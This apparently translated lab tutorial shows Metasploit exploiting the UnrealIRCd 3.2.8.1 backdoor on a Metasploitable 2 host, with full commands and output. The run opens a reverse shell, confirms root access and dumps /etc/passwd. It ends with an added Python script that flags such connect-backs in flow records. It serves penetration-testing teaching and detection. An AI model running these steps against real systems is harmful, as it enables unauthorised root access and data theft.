???????????????Nmap
[ 2015/9/11 10:55:02 ]
4-3: using the MSF terminal against the Unreal IRC service on the Metasploit 2 host, whose address is 192.168.6.105. The steps are as follows.
(1) Start the MSF terminal. Run the following command:
root@kali:~# msfconsole
msf>
The msf> prompt shows that the MSF terminal has started.
(2) Search for modules that match Unreal 3.2.8.1. Run the following command:
msf > search Unreal 3.2.8.1
Matching Modules
================
Name                                        Disclosure Date  Rank       Description
----                                        ---------------  ----       -----------
exploit/linux/games/ut2004_secure           2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure         2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Win32)
The output lists the modules that match the search. This example uses the unreal_ircd_3281_backdoor module.
(3) View the details of the unreal_ircd_3281_backdoor module. Run the following command:
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Platform: Unix
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
  hdm <hdm@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Automatic Target
Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  6667             yes       The target port
Payload information:
  Space: 1024
Description:
  This module exploits a malicious backdoor that was added to the
  Unreal IRCD 3.2.8.1 download archive. This backdoor was present in
  the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th
  2010.
References:
  http://cvedetails.com/cve/2010-2075/
  http://www.osvdb.org/65445
  http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
The output shows the details of the unreal_ircd_3281_backdoor module.
(4) Select the unreal_ircd_3281_backdoor module and view its configurable options. Run the following commands:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  6667             yes       The target port
Exploit target:
Id  Name
--  ----
0   Automatic Target
The output shows that RPORT already has a default value; RHOST still has to be set.
(5) Set the RHOST option. Run the following command:
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.6.105
RHOST => 192.168.6.105
The output shows that the target address is set to 192.168.6.105.
(6) List the available payloads. Run the following command:
msf exploit(unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
Name                                Disclosure Date  Rank    Description
----                                ---------------  ----    -----------
cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
The output lists the payloads that can be used with the unreal_ircd_3281_backdoor module. They are command Shell payloads rather than Meterpreter shell payloads; a reverse Shell payload is used here.
(7) Set the reverse Shell payload (reverse) and view the options again. Run the following commands:
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.6.105    yes       The target address
RPORT  6667             yes       The target port
Payload options (cmd/unix/reverse):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Target
The output shows that the LHOST option is not yet set.
(8) Set the LHOST option. Run the following command:
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.6.103
LHOST => 192.168.6.103
View the options again to confirm the settings:
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.6.105    yes       The target address
RPORT  6667             yes       The target port
Payload options (cmd/unix/reverse):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.6.103    yes       The listen address
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Target
The output shows that the required options are now set.
(9) Run the exploit. Run the following command:
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.6.105:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4G58mrIzlfNG2zIm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4G58mrIzlfNG2zIm "
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:53656) at 2014-07-16 09:34:05 +0800
The output shows that a command shell session was opened. No Shell prompt is displayed, but standard Linux commands can be run in the session. For example, check the current user:
whoami
The output is:
root
The output shows that the current user is root.
Next, view the /etc/passwd file:
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
The output shows the user accounts on the target system.
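Seen from the defender's side, the session in step (9) is the IRC server host 192.168.6.105 connecting back to port 4444 on a client that had just reached it on port 6667. The following example is added here and is not part of the original article; it flags that pattern in flow records. The record layout, the function name find_connect_backs and the sample records are assumptions constructed around the addresses and ports shown above.

```python
from collections import defaultdict

# Constructed flow records: (time_s, src_ip, src_port, dst_ip, dst_port).
# The two hosts and ports 6667/4444/53656 come from the session above;
# timestamps, other ports and the other hosts are made up for the example.
SAMPLE_FLOWS = [
    (100.0, "192.168.6.103", 40112, "192.168.6.105", 6667),  # client reaches ircd
    (100.4, "192.168.6.105", 53655, "192.168.6.103", 4444),  # server dials back
    (100.5, "192.168.6.105", 53656, "192.168.6.103", 4444),  # second dial-back
    (230.0, "192.168.6.50", 51000, "192.168.6.105", 6667),   # ordinary IRC client
    (400.0, "192.168.6.105", 39000, "192.168.6.1", 53),      # unrelated DNS query
]


def find_connect_backs(flows, service_port=6667, window=10.0):
    """Flag servers that open connections to a recent client of service_port.

    A listening daemon should only accept connections. If the server host
    connects out to a client within `window` seconds of that client reaching
    it on service_port, return (server, client, dst_port, count) for it.
    """
    last_inbound = {}        # (server, client) -> time of latest inbound flow
    hits = defaultdict(int)  # (server, client, dst_port) -> connections seen
    for ts, src, _sport, dst, dport in sorted(flows):
        if dport == service_port:
            last_inbound[(dst, src)] = ts
            continue
        seen = last_inbound.get((src, dst))
        if seen is not None and ts - seen <= window:
            hits[(src, dst, dport)] += 1
    return [(s, c, p, n) for (s, c, p), n in sorted(hits.items())]


if __name__ == "__main__":
    for server, client, port, count in find_connect_backs(SAMPLE_FLOWS):
        print(f"ALERT {server} opened {count} connection(s) to {client}:{port} "
              f"right after {client} connected to its port 6667")
```

The two connections counted for port 4444 correspond to the "first client connection" and "second client connection" lines printed by the double handler in step (9).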